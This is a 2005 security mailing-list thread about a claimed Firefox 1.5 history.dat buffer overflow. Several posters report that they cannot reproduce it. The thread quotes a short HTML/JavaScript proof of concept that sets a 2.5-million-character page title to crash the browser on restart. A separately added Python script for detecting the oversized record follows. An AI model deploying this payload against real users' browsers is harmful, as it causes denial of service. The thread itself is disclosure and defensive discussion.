Open Source and information security mailing list archives
Date: Thu Dec  8 19:51:55 2005
From: paranoidgeek at gmail.com (Matt)
Subject: re: Firefox 1.5 buffer overflow (poc)

Didn't work here, just made the system go a bit sluggish for a moment, as
you would expect when dealing with a 2.5 million character string.

Firefox:
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051130 Firefox/1.5
Built with:
gcc version 3.4.4 (Gentoo 3.4.4-r1, ssp-3.4.4-1.0, pie-8.7.8)
Window manager:
KDE 3.5.0

Possibly it is crashing the Windows API?

--
Matt


On 12/9/05, Ron <iago@...hallalegends.com> wrote:
>
> I was also unable to replicate it, on Firefox 1.5 i386 Linux EN
>
> ad@...poverflow.com wrote:
> >
> > Nor a fake, nor you really don't know what a buffer overflow is, but for
> > sure here on my Firefox 1.5 EN, the client is much longer to load on
> > the next boot, but it reloads fine without exceptions and there is
> > nothing about a security bug here...
> >
> >
> >> <!-- Firefox 1.5 buffer overflow
> >>
> >> Basically Firefox logs all kinds of URL data in its history.dat file;
> >> this little script will set a really large topic and Firefox will then
> >> save that topic into its history.dat. The next time that Firefox is
> >> opened, it will instantly crash due to a buffer overflow -- this will
> >> happen every time until you manually delete the history.dat file --
> >> which most users won't figure out.
> >>
> >> This proof of concept will only prevent someone from reopening
> >> their browser after being exploited. DoS, if you will. However, code
> >> execution is possible with some modifications.
> >>
> >> Tested with Firefox 1.5 on Windows XP SP2.
> >>
> >> ZIPLOCK <sickbeatz@...il.com>
> >>
> >> -->
> >> <html><head><title>heh</title><script type="text/javascript">
> >> function ex() {
> >>      var buffer = "";
> >>      for (var i = 0; i < 5000; i++) {
> >>              buffer += "A";
> >>      }
> >>      var buffer2 = buffer;
> >>      for (i = 0; i < 500; i++) {
> >>              buffer2 += buffer;
> >>      }
> >>      document.title = buffer2;
> >> }
> >> </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
> >> </a></body></html>
>
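A triage helper for the condition the PoC describes, added here as an example and not code from the thread or from any of its authors. It does not parse the history.dat format; it scans the file as raw bytes for the tell-tale signs of an oversized persisted title (a very long run of one repeated byte, or a record far longer than any normal line) so that a responder can confirm the cause before deleting a profile's history.dat. The threshold value and the sample record layout are assumptions.

```python
"""Flag abnormally long values in a Firefox history.dat (added example)."""
import re
from typing import Dict, Optional, Tuple

# Assumption: no legitimate history field comes anywhere near this length.
DEFAULT_THRESHOLD = 65536


def longest_repeated_run(data: bytes) -> Tuple[int, Optional[bytes]]:
    """Return (length, byte) of the longest run of a single repeated byte."""
    best_len, best_byte = 0, None
    # (.)\1* matches one byte followed by any number of copies of itself.
    for m in re.finditer(rb'(.)\1*', data, re.DOTALL):
        n = m.end() - m.start()
        if n > best_len:
            best_len, best_byte = n, m.group(1)
    return best_len, best_byte


def longest_line(data: bytes) -> int:
    """Length of the longest newline-delimited stretch in the file."""
    return max((len(line) for line in data.split(b'\n')), default=0)


def analyze(data: bytes, threshold: int = DEFAULT_THRESHOLD) -> Dict[str, object]:
    """Summarise the file and decide whether an oversized record is present."""
    run_len, run_byte = longest_repeated_run(data)
    line_len = longest_line(data)
    return {
        "size": len(data),
        "longest_run": run_len,
        "run_byte": run_byte,
        "longest_line": line_len,
        "suspicious": run_len >= threshold or line_len >= threshold,
    }


def analyze_file(path: str, threshold: int = DEFAULT_THRESHOLD) -> Dict[str, object]:
    with open(path, 'rb') as f:
        return analyze(f.read(), threshold)


if __name__ == "__main__":
    # Constructed sample: a short ordinary record, then a record carrying the
    # PoC's title (5000 + 500 * 5000 = 2,505,000 bytes of "A").
    normal = b"(80=http://www.mozilla.org/)(81=Mozilla)\n"
    poc_title = b"A" * (5000 + 500 * 5000)
    print(analyze(normal))
    print(analyze(normal + b"(82=" + poc_title + b")\n"))
```

Run `analyze_file` against the profile's history.dat; a result with `suspicious` set to True identifies the record that keeps the browser from starting.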